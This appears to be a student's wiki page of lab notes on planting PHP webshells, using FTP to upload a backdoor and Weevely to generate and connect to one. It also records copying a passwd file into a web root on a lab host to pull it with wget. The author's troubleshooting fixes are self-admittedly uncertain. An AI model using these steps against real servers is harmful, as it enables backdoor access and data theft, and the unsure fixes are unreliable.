Weevely Webshells - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki

Webshells

How to do

  1. Upload backdoor to desired webserver

Use FTP to connect to desired web server via ip address

ftp 10.0.5.25

Note: If the server is anonymous, the username is 'anonymous' and the password is left blank

Use put / mput to upload your file to the server

put /usr/share/webshells/php/simple-backdoor.php

NOTE: I wrote this before completing the prior lab that gave us webshells to use, so I do not actually have the correct code for uploading this specific script, however the syntax is the same.

This uploads your backdoor to the webserver

Weevely

What is it?

Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.

How to use

  1. First, generate a file

weevely generate password /home/champuser/file.txt

This generates a script with 'password' as the password under the new file file.txt located in /home/champuser/

  1. Push this script to the web server

ftp 10.0.5.25 put /home/champuser/System42.php

  1. Access the backdoor by using weevely and specifying the location on the target server

weevely http://10.0.5.25/upload/System42.php

  1. Run commands to initiate the session

Troubleshooting

My first attempt will be to use scp to transfer simple-backdoor.php to the /var/www/html directory on 10.0.5.21 under an admin account and hope that it deploys it.

scp simple-backdoor.php [email protected]:/var/www/html

UPDATE: This did not work as I do not have the sufficient privileges on the target box.

I will try the python3 server now because why not.

UPDATE: I did not end up using the python3 server, instead I ended up using my ssh access to access peregrin.took and move the desired files around where I wanted. Then I used wget to extract them from the webserver. I do not understand how to execute a web shell yet so this was my alternative. This worked.

  1. Using wget from hostbox, target the desired file

wget http://10.0.5.21/passwd (I moved the passwd file into /var/www/html to be able to do this)

For everything above, I was doing it on the wrong server. I am unable to use these techniques for the correct server.

Another issue I was having was being unable to upload files to the target server due to a passive mode glitch. The fix was mput instead of put, which worked for some reason.

UPDATE: This did not work in the end, it was not a long term fix. I do not know what the cause of mput working was, but it only worked once, which is all I needed.

Another issue I was having was with weevely itself. It gave me an error involving padding. I ended up fixing potentially by adding

base64.b64decode(s + b'==')

to the end of the php file generated. However I'm not too sure if this was the right fix, or if it was the new file I created on my second attempt that just ended up working without any issues.